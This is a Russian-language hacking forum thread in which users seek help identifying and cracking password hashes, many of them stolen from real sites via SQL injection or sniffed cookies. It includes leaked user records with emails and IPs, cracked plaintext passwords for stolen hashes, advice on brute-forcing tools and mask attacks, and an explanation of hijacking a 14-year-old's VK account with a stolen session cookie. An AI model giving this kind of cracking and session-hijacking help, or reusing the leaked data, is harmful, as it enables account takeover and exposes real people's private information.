(1050, 11, '', 0, 'АнЬка86', '3bbac56152a465e5c1fd4c23cef5db0b', '2007-04-03', 'vasilisa@bk.ru', 0, '', '', '', '', '', 1, 'знающий', 0, 1175595707, 0, 1179147243, 1179213798, 1179125271, 10, 10, 5, '0', 1, 0, 1, 11541847, '01-29-1986', '1986-01-29', -1, 2, '213.219.220.254', 0, 0, '', 0, 0, 2, 0, 0, 'eKr', 0, 2, '', 0, 0, 0, 0, 0, 0, '', 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1),
может не правильно соображаю ?
по идее, хэш тот, которых выделил жирным..
может подскажете в чем секрет ?

3bbac56152a465e5c1fd4c23cef5db0b Хеш
eKr
Соль
md5(md5($pass).$salt)

помогите узнать,что за метод шифровки?

*6D59D2C559BD33D69913664A43494789771924A

MySQL5

MySQL5


это MD5 или что?

спасибо

как достать хэш админа из Joomla ?
версия 1.0.13

$1$NYgVhryn$FA8fg0mckf3NEFPTKY8kN0
$1$ESHSmVxB$Xw8eHD.F6lRWiaeOLeXbd.
$1$2xEF1OD8$KLAc.VxGT7U8riGRKuPp6.
$1$7lNCdBkU$prOa64CDWccfVadfs1pqy/
подскажите что это за алгоритм и чем брутить?

Никто не сталкивался в инете с распределенными вычислениями? Типа Боинка. Или мож тут есть живые проекты? Хочется так сказать поучаствовать и что бы в нужный момент можно было самому быстро расшифровать хеш. Кто нить в курсе?

Ребят, помогите что за хэш?

9333d4e9f7f6454ad8b224e5f2461f31:H6Rs6Mg5wkA4YOohN aQClqtd72ERIcYw

Ребят, помогите что за хэш?

9333d4e9f7f6454ad8b224e5f2461f31:H6Rs6Mg5wkA4YOohN aQClqtd72ERIcYw
md5($pass.$sault) - Joomla 1.5
для расшифровки PasswordsPro юзай

эта поеботня не катит

Помогите опознать, что за хеш?
*EE089D8C31729E15B62879E875110121579158EB
Заранее огромнейшее спасибо

Помогите опознать, что за хеш?
*EE089D8C31729E15B62879E875110121579158EB
Заранее огромнейшее спасибо
Результаты поиска по ПАБЛИК и ПРИВАТ базе:
хэш MySQL5:ee089d8c31729e15b62879e875110121579158eb:x5 7951

Юзай сервис hashcracking.info - многие вопросы сразу отпадают ;)

Ребят, помогите что за хэш?

9333d4e9f7f6454ad8b224e5f2461f31:H6Rs6Mg5wkA4YOohN aQClqtd72ERIcYw
ну так чо??? кроме девочки понтов, не кто не ответит

з.ы ребят может кто рассшифрует??

ну так чо??? кроме девочки понтов, не кто не ответит

з.ы ребят может кто рассшифрует??

Хэш скорее всего мд5 по любому с солью, а вот каков алгоритм функции при конечном хэшировании - х.е.з. тут вариантов масса.
P.S. Есть известный пасс и хэш с солью от него?

Здравствуйте.

Пытаюсь переконвертировать одну базу данных в другую. Так вот у меня есть файлы в формате DBF. Сама программа скорей всего написана на FoxPro.
В исходном файле (таблице) помимо основных записей есть поле "foto", в котором записи имеют следующий вид "$a{ -JN".
В отдельной папке хранятся фотографии, именами которых выступает дата и (20080112...).
Вручную установил соответствие:
$a¦¦Q3L = 20081221801948
$a¦¦Q3Q = 20081221801953

Как я понял $a - это переменная, дальше всё... Толи используется алгоритм шифрования, толи...

Вопрос: Каким образом мне расшифровать записи в DBF ("$a{ -JN"), чтобы потом я смог связать нужные фотографии с полями в базе данных?

Подкиньте дельную мысль.

подскажите как заставить джона генерировать пароли в файл состоящие только из цифр и длинной 8,9,10 символов и при этом применить какие нибудь алгоритмы сокращиния перебора.Сам никак не смог додуматься. Использую джона по линуксом.
Или переместите в нужную тему а то прочитал весь форум и так и ненашел где задать этот вопрос.

вот нашел в mysql в таблице users вот такие хеши:

novak:2a205d7d314579a907ce187
drsjir:118f8a42ce5676faa3fc19

не могу определить, что за алгоритм. соли точно нет. в таблице всего 4 поля id, username, password, supervisor.

вот нашел в mysql в таблице users вот такие хеши:

novak:2a205d7d314579a907ce187
drsjir:118f8a42ce5676faa3fc19

не могу определить, что за алгоритм. соли точно нет. в таблице всего 4 поля id, username, password, supervisor.

Может это урезанный хэш mysql5?

можно ли достать админку форума vBulletin Version 3.7.2
в смысле куда копать и вообще взламывается ли?

кто встречал такие хеши? что это за алгоритм?

| хеш | соль

| 39d7a28a935b0270c410284c278c9189661adc55 | 0882c6fa9d22327809f44d856c152297
| b7d2f2cbf56e1e1363c1fda2d4a990d9d37cc59d | e4315421468d58791521ecf1c59ea2c4
| 18ef37c2101cc581fa81374238a4f2eecb43c0ee | d2e864ed8f0e6c043ef034519d0a84ba

исходники просматреть нет возможности. хеши получены через сукуль-инжект.

INSERT INTO auth_user VALUES('theadmin','186405de69f854d0');
INSERT INTO auth_user VALUES('webmaster','0c458fde308cd12d');
INSERT INTO auth_user VALUES('jdawg','65e0624308310f91');

что за хеши такое?

INSERT INTO auth_user VALUES('theadmin','186405de69f854d0');
INSERT INTO auth_user VALUES('webmaster','0c458fde308cd12d');
INSERT INTO auth_user VALUES('jdawg','65e0624308310f91');

что за хеши такое?


похожи на MySQL

получаю куки на снифер от YaBB 2.1! При подмене кукисов не работают хэши с пробелами, например Y2Pass-56613=2au8F5W0CHYai0OiVG7 qw; если подстовляю хэши без пробелов то все нормально. Мож ктото знает почему хэшы с пробулами не подменяются и что вопще можно сделать ?

Подскажите, есть ли онлайн сервисы расшифровки Domain Cached Credentails? Или может кто поможет с расшифровкой, есть имя пользователя, сам хеш, о пароле известно, что он начинается с заглавной буквы, содержит только lower case символы (кроме первого и последнего), последим символом является восклицательный знак. Длина более 10 символов, но не более 14. К сожалению на моих ПК расшифровка даже 12 символьного хеша по данной маске (использую PasswordsPro) займет 1002 дня (((

Подскажите, есть ли онлайн сервисы расшифровки Domain Cached Credentails? Или может кто поможет с расшифровкой, есть имя пользователя, сам хеш, о пароле известно, что он начинается с заглавной буквы, содержит только lower case символы (кроме первого и последнего), последим символом является восклицательный знак. Длина более 10 символов, но не более 14. К сожалению на моих ПК расшифровка даже 12 символьного хеша по данной маске (использую PasswordsPro) займет 1002 дня (((
http://forum.antichat.ru/showthread.php?p=488909 ;)

http://forum.antichat.ru/showthread.php?p=488909


Спасибо, эту информацию я изучил, как и многое другое. К сожалению не нашел более быстрого способа перебора, чем атака по маске в PassPro. Можно попробовать JTR, существенного прироста не получим. А использовать новые брутеры с поддержкой CUDO, которые увеличивают скорости на порядки - нет возможности. Пробовал и по словарю с самостоятельно написанными правилами. К сожалению, есть предположение переходящее в уверенность, что автор использовал "падонкаффский языг" в сочетанием с русским матом. На такой случай гибридный перебор не действенен. Соответствующие таблицы замены символов просто невозможно составить.

Здравствуйте.
Подскажите каким алгоритмом шифруется пасс на Radmin v3.3
Есть физический доступ к реестру этого компа.
И с помощью чего можно брутить тот алгоритм.
Или сцылку где почитать про это дело.
Спасибо.

блин ребят кто может вычислить метод этой кодировки?
7f65a9a8c5bbaff6cb8f759

ijklvmnumtstg48qog2oh54gb6
подскажите что за зверь

он на хеш и не смахивает

вобщем суть вся в том что есть у меня прога и для её регистрации нада паслать разработчикам такой кад каторый выплёвывает прога 4BB4B4BBFFFBF676BB977765CF54FA5

и как я понял этот код прогя тянек както с винды
после чего разработчик генерирует с того что я послал мой ключ к проге и выглядит он таким образом

7f65a9a8c5bbaff6cb8f759

и вот вопрос что это за кодировка каторую использует разработчик для генерации ключа к проге?

спасибо заранее всем кто паможет разобраться

INSERT INTO auth_user VALUES('theadmin','186405de69f854d0');
INSERT INTO auth_user VALUES('webmaster','0c458fde308cd12d');
INSERT INTO auth_user VALUES('jdawg','65e0624308310f91');

что за хеши такое?

186405de69f854d0:chumbawamba
0c458fde308cd12d:webmistress
65e0624308310f91:jdawg
Все MySQL

кто встречал такие хеши? что это за алгоритм?

| хеш | соль

| 39d7a28a935b0270c410284c278c9189661adc55 | 0882c6fa9d22327809f44d856c152297
| b7d2f2cbf56e1e1363c1fda2d4a990d9d37cc59d | e4315421468d58791521ecf1c59ea2c4
| 18ef37c2101cc581fa81374238a4f2eecb43c0ee | d2e864ed8f0e6c043ef034519d0a84ba

исходники просматреть нет возможности. хеши получены через сукуль-инжект.

половина мускуль5 половина sha1, надо брутить, в паблик базе не нашёл

[1]:*AD4B23E06DAC7D62A0786BAC66EC876A53E24443:root
[2]:248bfe963fe80077:24x7

подскажите плз тип хэша в первый раз такое вижу
первый sha1 думаю либо мускуль5 второй мускуль5

root:*D8EF8390BA6C711D1D568DF588BC86AA29571091

:*2083E47887E4CE521F4526E2F397FE4C1C863775

:*366673C400C0849B8B92DB70A8A2548EC211BFC9

:*C078A2E9D1439D2F0139D592E8B054620D339226

Проблемка достал хеш пароля через sql-inj (mysql VERSION():5.0.67-percona-highperf-b7-log)... но в место первого символа стоит * (хеш у mysql вроде 16 символов) так вот почему это так получилось и правильно ли я думаю...? пробовал подставлять вместо * цифры от 0 до 9 расшифровать не получилось...

вот поля из таблицы
id,name,email,login,passwd,info

1:vasya:admin@site.ru:admin:*DFD7AA14DFC5014:01,01 ,2008

Никак не могу поянть что это за алгоритм хэширования. Похоже на мд5 но нето

2ba195d508f6f17dd8410ec042119c96b87775e3

Никак не могу поянть что это за алгоритм хэширования. Похоже на мд5 но нето

2ba195d508f6f17dd8410ec042119c96b87775e3
Результаты поиска по ПАБЛИК и ПРИВАТ базе:
хэш SHA-1 или MySQL5:2ba195d508f6f17dd8410ec042119c96b87775e3:п ароль_не_найден, хеш уже есть в очереди

юзай hashcracking.info (https://hashckacking.info)
в данном случае это sha-1 - буквы пишутся строчными, в MySQL5 - заглавными

Результаты поиска по ПАБЛИК и ПРИВАТ базе:
хэш SHA-1 или MySQL5:2ba195d508f6f17dd8410ec042119c96b87775e3:п ароль_не_найден, хеш уже есть в очереди[/FONT]

юзай hashcracking.info (https://hashckacking.info)
в данном случае это sha-1 - буквы пишутся строчными, в MySQL5 - заглавными

спс. понял это sha-1 значит.

зы ппц какие умные резирвисты. сказал что это мд5 и потом мессагу свою удалил

Подскажите плз что за алгоритм и если можно расшифруйте
*BEAA9A890D3C71995E3B23C6D65FBD096AACB003

Это Mysql5

На хешкрякинг тип не определен пишет(

На хешкрякинг тип не определен пишет(
Это Мускул5, а хешкрек пишет не определен потому что ты задал его со звездочкой в начале

подскажите каким методом зашифрован пароль
если хеш вида *C42CFC209BFFD9F2F108702740F4FA1A14863CF7

мускул 5 , на хешкрякинг нет в базе.

Не могу разобраться с получиными куками, вот что приходит на снифер: QUERY: __utma=67226631.1064085047.1246013211.1247313911.1 247317910.91; __utmz=67226631.1246013211.1.1.utmccn=(direct)|utm csr=(direct)|utmcmd=(none); keyv2=9eba02e94bcb1a858bbeb17007e386732829aa704eb3 1d58880034cadbd2b25c; PHPSESSID=9508e2f8b9d509d3f4476b62de401df7; __utmb=67226631; __utmc=67226631
подставляю эти куки, но зайти под чужой сессией не могу. Я так думал что пароль зашифрован в keyv2, но почему то из Оперы и Лисы приходят разные хэши (keyv2). Если в Лисе меняю пасс то меняется только вторая часть хэша. Кто знает что тут можно придумать?

мб сессия закончилась? ты проверял на своем акке? и вообще ты темой ошибся

проверял, не закончилась, сюда написал потому что хотелось бы узнать что это за алгоритм 9eba02e94bcb1a858bbeb17007e386732829aa704eb31d5888 0034cadbd2b25c

Не подскажете, какой это алгоритм?

chc7451bb77a1bb22bf2f0bec879b75ac3
chdd2f673de50f6ed7c1848be2223dff00

Хотелось бы узнать, что такое соль (salt) и с чем ее едят? )

Провел SQL, выташил : db43214d25a9cb79ffb706408ab2ef92

Подскажит, это какой алгоритм шифрования ?

Хотелось бы узнать, что такое соль (salt) и с чем ее едят? )

Провел SQL, выташил : db43214d25a9cb79ffb706408ab2ef92

Подскажит, это какой алгоритм шифрования ?

это обычный MD5.

сбрутить можешь через PasswordsPro.
или если у тебя видюха от nvidia 8600 gt и выше, то cuda.

скачать можешь от сюда _http://www.insidepro.com/rus/

хочу помогать брутить хэши! но есть несколько вопросов, в использовании прога PasswordsPro и видюха GeForce 9600 скоро будет в SLI стоять
1) сколько хешей лучше брутить 1 или сразу в прогу вбить несколько хэшей???
2) как использовать свою видеокарту с прогой для ускорения процесса брута?
3) с какого метода брута начинать использование программы! и какой из них более эффективен?
ну вроде пока что все!
вопросы будут полюбому!

Gordiy
смотря что именно ты хочешь.
Если брутить по 1-3 хешу тут на форуме, то видеокарта тебе не очень поможет) раз в 20 быстрее это сделают рейнбоу таблицы.

Если хочешь всерьез заняться брутом - зайди на хешкрекинг.инфо и почитай, там есть достаточно нужной тебе инфы, касающейся конкретно хешкрекинга.

вкратце по твоей теме скажу лишь 2 вещи - ПассПро брутит только на процессоре (CPU). Так же ждя брута на процессоре можно использовать программы UDC и John the Ripper.
Для брута видеокартой (GPU) используются другие программы - EGB, LHC и брутер от xSerge. Хотя так же существуют несколько других, пока еще развивающихся и значительно уступающих вышеперечисленным прог.

все остальное ищи сам либо в этом разделе форума (старые темы), либо на хешкрекинге.
Я имею ввиду факи по работе с программами, по тому, какие маски эффективнее, списки словарей для брута и прочее.

Ну а если совсем в 2 словах - качай словари для брута, заряжай их в пасс-про и бруть=)
+ качай прогу от xSerge (поюзай поиск, легко найдешь) Она бесплатна.
и... бруть параллельно на пасспро и видеокарте.

ErrorNeo
спасибо большое за направление и разъяснение! будем читать да пробовать!
название проги от Xserge можешь сказать?

нет у нее как такового названия
самое точное название - именно "брутер от xSrege" :D
гугл тебе может тоже не очень помочь поэтому даю точный адрес где ее найти:

хешкрекинг » Арсенал начинающего бруттера » <<<MD5, minirelease, CUDA>>>

Есть еще другая, в отличие от этой очень широкоизвестная программа - EGB - но она стоит денег. От xSrege-вской отличается только тем, что можно использовать маски, есть функция LastPassword ну и алгоритмов держит чуть по-больше.

Но по большому счету тебе пока что с головой хватит и проги от xSerge.
(+ можешь скачать EGB demo. Ограничение там только п времени брута - максимум 3 минуты - но если твои маски не будут превышать этого интервала и идти подряд...^^
будет то же самое что и платная, фулл-версия, по-сути.)
Ну а если совсем ворвешься, тада можешь и полную версию купить. Она в любом случае стоит своих денег.

не битую ссылку на скачку Passwordpro пожалуйста , потерял Flashkard на ней все словари вся инфа а ПК на родине.
З.Ы. Буду очень признателен !

Что за алгоритм?

user_password = md5(concat(user_id,'-',md5('your_password')))

Такой хеш используется в MediaWiki. Можешь ломать его как md5($salt.md5($pass)). Солью будет user_id с минусом.

а можно здесь расшифровать хэш md5(md5($pass).$salt)? у меня комп слабый, долго очень брутит
---
всё, разобрался)

всё нашлось....

ErrorNeo
все понятно спсибо за разжованность, а темки хорошие сиджу вот читаю!
хешкрекинг » Арсенал начинающего бруттера » <<<MD5, minirelease, CUDA>>>

Как определить метод хеширования? Есть кукисы, есть хэш пароля в куках. Для брута пароля по хэшу нужно выбрать метод хеширования --> нужно знать этот метод. Внимание, вопрос: как узнать метод хеширования на определённом сайте (движок сайта самописный)?

как вариант посмотреть в сурсах или же определить по его виду

По виду это понятно... можно отличить base64 от md5... но ведь разновидностей md5 вон сколько! а в сурсах... а где ты в сурсах увидишь метод хэширования? Йа нинашол... =(

M@ZAX@KEP, если в куках нет ничего похожего не соль то это, вероятнее всего, либо MD5 либо двойной MD5. Пробруть как обычный, если не получится - попробуй как двойной)

как шифрует пароли proftpd ?
вот пример //j4ZvF3NK0v.

c0m
это зашифрованное алгоритмом DES(UNIX) слово kastanie

как разшыфровать хеш в uCoz например $1$lcFX$9y4AoNIDFz1uG9O645dOs1

как разшыфровать хеш в uCoz например $1$lcFX$9y4AoNIDFz1uG9O645dOs1
блин трудно совсем юзат гугл? Вот посмотрим оттуда примеры хешей:
хеши (http://www.insidepro.com/hashes.php?lang=rus)
Насчет uCoz хз поиши еще наверное это md5(Unix) по виду

MD5(unix) это ведь 1000 раз вызванный обычный md5(). Тогда почему хеши md5(unix) не 32значные? Что там означают символы ".", "/", "$" и "1" ?

MD5(unix) это ведь 1000 раз вызванный обычный md5(). Тогда почему хеши md5(unix) не 32значные? Что там означают символы ".", "/", "$" и "1" ?

http://forum.insidepro.com/viewtopic.php?t=2562&sid=87d5df2caa4a31cde1fe028ce7673481

Люди,можете,пожалуйста,объ� �снить работу алгоритма ?

Тут инфа: http://ru.wikipedia.org/wiki/MD5

Входные данные выравниваются так, чтобы их размер был сравним с 448 по модулю 512 (L’ = 512 × N + 448). Сначала дописывают единичный бит в конец потока, затем необходимое число нулевых бит (выравнивание происходит, даже если длина уже конгруэнтна — сравнима с 448).

что это за операция такая L’ = 512 × N + 448 ? Что значит поток ? Пример,если можно.

__________________________________________________ ______________________

Помогите определить тип хеша. Получил его из базы данных 5.0.81-community (это пасс админов)

b913662cf7e7dd0dc81ecd21c4f78447:23
268076835eb9c6ea28c79fc10040c420:a9
6c5c636e1455b20a1d1c269889796ef3:19

2 Infate
Алгоритм md5($salt.$pass)
268076835eb9c6ea28c79fc10040c420:a9:qwe321
6c5c636e1455b20a1d1c269889796ef3:19:test
З.Ы. Да, и что то не похожи они на админские :(

HELLP!! Может я чайник (так скорее всего и есть) но у меня проблеммка при использовании сплойта для получения хэша у меня вместо хэша выдает следующиее:

Trying to get your cookies... [DONE]
Trying to get passhash: 00000000000000000000000000000000 [DONE]
Trying to get salt: 11111111111111111111 [DONE]

По идее вместо 0000000.... должен был быть сам хэш

Неужели это просто прикрыли разработчики? Подскажите

как разшыфровать хеш в uCoz например $1$lcFX$9y4AoNIDFz1uG9O645dOs1

интересует анологичный вопрос

интересует анологичный вопрос

Использовать модуль в PasswordsPro: Md5(Unix)

mysql 5.0.45-log выдает следующее (логин:пароль):


user1:yћ+Ў»?ЏкцпGЅZ‡
user2:YТа#аІ2˜А>.¶tHј
user3:ќлО1tМxU©Г_k¤
user4: ЧЁq…fФ¦ШWgL¶3


А теперь вопрос. Чем в закодирован пароль?

да, соленый.

Список используемых алгоритмов - соседняя прикрепленная тема рядом. Зайди, там есть очень удобная таблица.

Смог выдрать куки из вконтакта.

Вот:

remixlang=0;%20remixautobookmark=2;%20remixap=0;%2 0remixgroup_closed_tabs=0;%20remixchk=5;%20remixmi d=18254276;%20remixemail=xxxxxhereemailxxxx%40mail .ru;%20remixpass=de0fe6308869abacda4af539795cb449; %20remixsid=14ebe0b00cef5a8c25560f2bb26b882e888030 e7e0579c50deb2c644;%20remixclosed_tabs=


Емайл я скрыл. Как расшифровать пароль? Я так понимаю это de0fe6308869abacda4af539795cb449 он. Но md5 не расшифровывает. Хелп плиз!

привет,не уверен,что задаю вопрос в правильной теме но интересует как расшифровать пароль из куков от ВК
например 39dcccf45fee8b80fe78b0956e4767f8
или вот такой 7eba35a09351ab735c818db75c628f0b спасибо

привет,не уверен,что задаю вопрос в правильной теме но интересует как расшифровать пароль из куков от ВК
например 39dcccf45fee8b80fe78b0956e4767f8
или вот такой 7eba35a09351ab735c818db75c628f0b спасибо
md5 -> http://forum.antichat.ru/thread136443.html (http://forum.antichat.ru/thread136443.html)

2 Alexeika

remixmid=18254276 <номер id ВКонтакте, от которого куки. В данном случае id18254276, 14-летняя девочка Саша>
remixemail= и так понятно,
remixpass=de0fe6308869abacda4af539795cb449 - пароль от анкеты, зашифрованный алгоритмом MD5,
remixsid=14ebe0b00cef5a8c25560f2bb26b882e888030e7e 0579c50deb2c644 - номер сессии.

самое любопытное тут в том, что для того чтобы зайти на эту анкету в качестве хозяина (хозяйки) из всех куков достаточно знать один лишь remixsid, все остальное можно вписать вообще от балды, и всё равно зайдешь. "Действителен" remixsid будет до тех пор, пока она (когда-нибудь) не нажмет у себя кнопку "выход", т.е. зная лишь его ты, на самом деле, можешь очень долгое время беспрепятственно заходить на анкету.
Пасс же тебе могут попробовать подобрать в треде Расшифровка hash. Part1 (MD5) , он рядом.

Почитал про Rainbow Tables, но не понял- что лучше исользовать словари или таблицы?
У меня словарик на 35 гигов, время полной проверки ~8-9 часов. Поэтому и возникает вопрос, может скачать отсюда-hashcracking.info таблички, улучшится поиск? И возможна ли по этим таблицам, "вспоминание" пасов такого вида- md5($pass.$salt) md5(phpbb3)?

И подскажите чем удобней выдирать хэши из базы? Если просто md5, то пользую прогу от ErrorNeo, а вот если надо выдрать логин:хэш:соль- здесь возникает проблема.

да, таблицы улучшат пробив.
качать лучше с rainbowtables.com
описание как оттуда качать есть тут:
хешкрекинг » Инструментарий » Арсенал начинающего бруттера » Rainbow tables (md5) в инете для закачки
брутить таблицы могут только чистые md5 хеши.
как выдирать соленые хеши из таблицы - не подскажу,
но можешь показать пример таблицы - я допишу опцию в своей проге)

Что бы далеко не ходить.
Joomla
"id" "name" "username" "email" "password" "usertype" "block" "sendEmail" "gid" "registerDate" "lastvisitDate" "activation" "params"
Всегда интересны столбцы: username:password и email-username:password
Пример готовой таблицы _http://upwap.ru/533318

Что то мой джон (John the ripper, в двух сборка - оригинал и с полным патчем) глючит пострашному.
Подсовываю ему MD5
administrator:726e542bd643df9d8147f5894bd3ad0d
а он выдает:
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2-16])

Из-за чего такое получается? при форсированном ручном определении формата - ругается что нет хеша. Со всеми остальными форматами все ОК!

Что то мой джон (John the ripper, в двух сборка - оригинал и с полным патчем) глючит пострашному.
Подсовываю ему MD5
administrator:726e542bd643df9d8147f5894bd3ad0d
а он выдает:
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2-16])

Из-за чего такое получается? при форсированном ручном определении формата - ругается что нет хеша. Со всеми остальными форматами все ОК!
поставь патч john-1.6.37-raw-md5-1.diff (ftp://ftp.openwall.com/pub/projects/john/contrib/john-1.6.37-raw-md5-1.diff.gz)

очень сильно извеняюсь за офтоп но очень нужно узнать каким образом генерируется мускульный хещ такого вида 11d9949972e5cf7f.
как его сгенерить через пхп или сервис для перевода строки в него. буду очень благодарег

<?php
$passwordhash = password($_post['password']);
$sql = 'insert into user (username,passwordhash) values (?,?)';
$result = $db->query($sql, array($_post['username'], $passwordhash));
?>http://articles.org.ru/cfaq/index.php?qid=2430


PASSWORD(str)
Создает строку "пароля" из простого текста в аргументе str. Именно эта функция используется в целях шифрования паролей MySQL для хранения в столбце Password в таблице привилегий user:

mysql> SELECT PASSWORD('badpwd');
-> '7f84554057dd964b'
http://www.mysql.ru/docs/man/Miscellaneous_functions.html

как сделать так чтобы при регистрации на форуме phpbb3 пароль не шифровался в БД, а просто записывался в том виде что и есть?

PS: Я адмипн форума и имею доступ к БД

Через скулю вытянул хэш, расшифровали.
Ввожу я этой сс.. лог и пасс, а она мне в ответ:
Цитата:
Incorrect Username, Password, or Access Level. Please try again

Хотя 100% данные правильные. Перепроверил ещё раз через этуже инъекцию. Из-за чего такое может быть? csm Joomla

Писец... уже четвёртый пасс не хочет принимать. Разные страны, разные тематики, а проблема одна. Может кто сталкивался всё-таки с похожей проблемой?

Через скулю вытянул хэш, расшифровали.
Ввожу я этой сс.. лог и пасс, а она мне в ответ:
Цитата:
Incorrect Username, Password, or Access Level. Please try again

Хотя 100% данные правильные. Перепроверил ещё раз через этуже инъекцию. Из-за чего такое может быть? csm Joomla
назови имя таблицы из которой ты вытянул,и какое окно у админки было ?или просто окно авторизации(стандарное браузера)
Ты мог ошибиться в сайте,т.е выдрал данные из соседнего сайта,который висит на этой де базе с другим прификсом.В я обычно контент выдераю из бызы и по гуглу проверяю .
у меня с известными двигами все норм,а вот самописки приходиться подумать когда 5 таблов с пользователями,и 2 типо админки

Вопрос новичка в данной области:
у меня есть стопарик md5 хешей и части исходного текста, т.е. тексты
abcdefxxx
sadassxxx
s34clsaxxx
...
Мне надо узнать xxx
Количество известных подобных пар мне что-то дает или все равно брут?
Количество могу раздобыть теоретически любое. Черный ящик вообщем.

Вопрос новичка в данной области:
у меня есть стопарик md5 хешей и части исходного текста, т.е. тексты
abcdefxxx
sadassxxx
s34clsaxxx
...
Мне надо узнать xxx
Количество известных подобных пар мне что-то дает или все равно брут?
Количество могу раздобыть теоретически любое. Черный ящик вообщем.
используй атаку по маске

p/s https://forum.antichat.ru/showthread.php?t=28129

?l - нижний регистр латинских букв
?d - цифра
?u - верхний регистр латинских букв
?s - спец.знаки.
А если ты знаешь что последние 5 символов это что-то из набора (a-z,A-Z,0-9) то как задать?

А если ты знаешь что последние 5 символов это что-то из набора (a-z,A-Z,0-9) то как задать?

В PPro нажмешь сервис -> настройки -> наборы символов и вставишь в "Пользовательские наборы символов" то, что тебе нада. затем атака по маске, и введешь маску, которая тебе нужна.

Я особо не вкурсе но что можно сделать с этими данными?
http://i061.radikal.ru/0909/45/fb7b238d35e8.jpg (http://www.radikal.ru) и ещё вопросик после строки acunetix-aspect-pawword: 52954e212fed4c0974eba2242fdaba6e - это не пароль ли зашифрованный?

Пароль шифруется ф-й crypt() в пхп.

Метод шифрования: crypt($password,12345));
Хеш: 12tir.zIbWQ3c
Пароль: 123456

Чем можно расшифровать/пробрутить хеши, для passwordspro не нашел нужный плагин.

GrAmOzEkA читаем http://www.softtime.ru/dic/id_dic=19
и понимаем что это DES(Unix).
12345 - это соль.

точнее фактическая соль - 12, а 345 как бэ уходят в никуда)
Хотя возможно тот, кто написал у себя ф-цию crypt($password,12345)) об этом и не знал.

Не могу разобраться в чем причина - сервер запущен, агент тоже, но в логах агент пишет:
2009/09/29 15:04:51.906 успешное подключение к сереверу
2009/09/29 15:04:51.921 нет работы на сервере
2009/09/29 15:04:51.921 отключение от сервера

И все, процесс на сервере запущен, но прогресса нет. Кто юзает прогу - помогите, плиз.

AfterDay...
Короче, проблема не в настройках, а с модулем, который в ответе за расшифровку .p12 файлов. Все остальные расширения прога берет, кроме этого. В итоге, проблема не отпала, а конкретизировалась - у кого были подобные проблемы - отпишитесь.

чем брутить этот алгоритм?
substr(md5(mt_rand()), 0, 4) может есть программа, которая переделает его в другой алгоритм?
в pp и gpu его нету

SMF 1.1.5 to 1.1.6
http://custom.simplemachines.org/upgrades/index.php?action=upgrade;file=smf_patch_1.0.14-1.1.6.tar.gz;smf_version=1.1.5
'passwordSalt' => '\'' . substr(md5(mt_rand()), 0, 4) . '\'',
для более качественной генерации рандома бирется md5 от рандомного числа, и первые его 4 символа записываются в качестве соли юзера.
Сам же пасс же юзера в SMF шифруется алгоритмом sha-1($username.$pass), и для расшифровки этой соли не требует.

Если у тебя 40-символьные хеши - бруть как sha-1($username.$pass), если 32-символьные - бруть как md5. Только учти, что никакого отношения к паролю пользователя (да и вообще к самому пользвоателю) эти md5 хеши не имеют. Важны только 40-символьные, содержащие пасс.

извините за мего нубский вопрос, но как в passwordspro работать с несколькими хэшами? после того как один хэш добавлю, больше не добавляется(

Люди НЕЛП ПЛИЗЗЗ я млин замучался этими переборами кто нить
переберите вот эти плизз по своей базе а то ни как не могу
уже все сервисы в нете испробывал один куй не в какую!

6b98935f7970422fe704a9f4d35308c6
28705853358ebd679f1ebb5654be50b8
12271127cc5d4846d44f751388b5c30d
a65ee0f370a5a502572f8cad07bbe30f
98693bf1ecf2e33cb78ab90a98fe015a
0ca59c2798723214f1bd026dc1fc3213

извините за мего нубский вопрос, но как в passwordspro работать с несколькими хэшами? после того как один хэш добавлю, больше не добавляется(

Впиши в текстовый файл свой хеши и выбери из файла и все и бруть!!!!!

чем брутить хэши используя CUDO на видюхе??

2navigat0r
Наверное вы имели ввиду CUDA?
BarsWF, Extreme GPU Bruteforcer

чем брутить хэши используя CUDO на видюхе??
Extreme GPU Bruteforcer
IGHASHGPU
BarsWF
<<<MD5, minirelease, CUDA>>> (https://hashcracking.info/forum/viewtopic.php?f=10&t=12)

по сути, надо программу которая будет выдергивать из дампа хеш:соль
подскажите название или сылочку дайте...
спасибо заранее

в паблике таких не встречал.

по сути, надо программу которая будет выдергивать из дампа хеш:соль
подскажите название или сылочку дайте...
спасибо заранее
какой формат? почему сразу не дампить по уму ?
на php быстро такой парсер накатают :)

Я просто загоняю дамп в локальную БД, а потом используя MySQL Query Browser делаю CONCAT нужных мне полей и копирую результат в текстовый редактор.
Т.к. результат получается в кавычках, избавляюсь от них автозаменой(если в соли не могут быть кавычки), или регуляркой в NotePad++ если кавычки в соли всёже встречаются.

подскажите онлайн сервисы для расшифровки md5(unix)
и скажите когда вводишь хеш то соль надо вводить или нет
вид хеша
$1$OFgQlse0$i8QN7Wa24ifkVirdSUkfG0

онлайн сервисов под md5(unix) нет. можешь запостить тут рядом в теме.
нет, соль вводить не надо.